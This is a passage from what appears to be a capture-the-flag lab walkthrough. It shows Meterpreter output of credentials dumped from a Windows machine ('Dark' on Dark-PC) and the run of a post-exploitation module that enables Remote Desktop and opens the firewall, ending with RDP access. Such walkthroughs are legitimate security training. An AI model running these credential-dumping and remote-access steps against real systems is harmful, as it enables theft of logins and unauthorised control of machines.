    tspkg credentials
    =================

    Username  Domain   Password
    --------  ------   --------
    Dark      Dark-PC  Password01!

    kerberos credentials
    ====================

    Username  Domain     Password
    --------  ------     --------
    (null)    (null)     (null)
    Dark      Dark-PC    Password01!
    dark-pc$  WORKGROUP  (null)

meterpreter > run post/windows/manage/enable_rdp

    [*] Enabling Remote Desktop
    [*]     RDP is already enabled
    [*] Setting Terminal Services service startup mode
    [*]     The Terminal Services service is not set to auto, changing it to auto ...
    [*]     Opening port in local firewall if necessary
    [*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20200503141549_default_10.10.181.247_host.windows.cle_049924.txt

Access via RDP gained !!!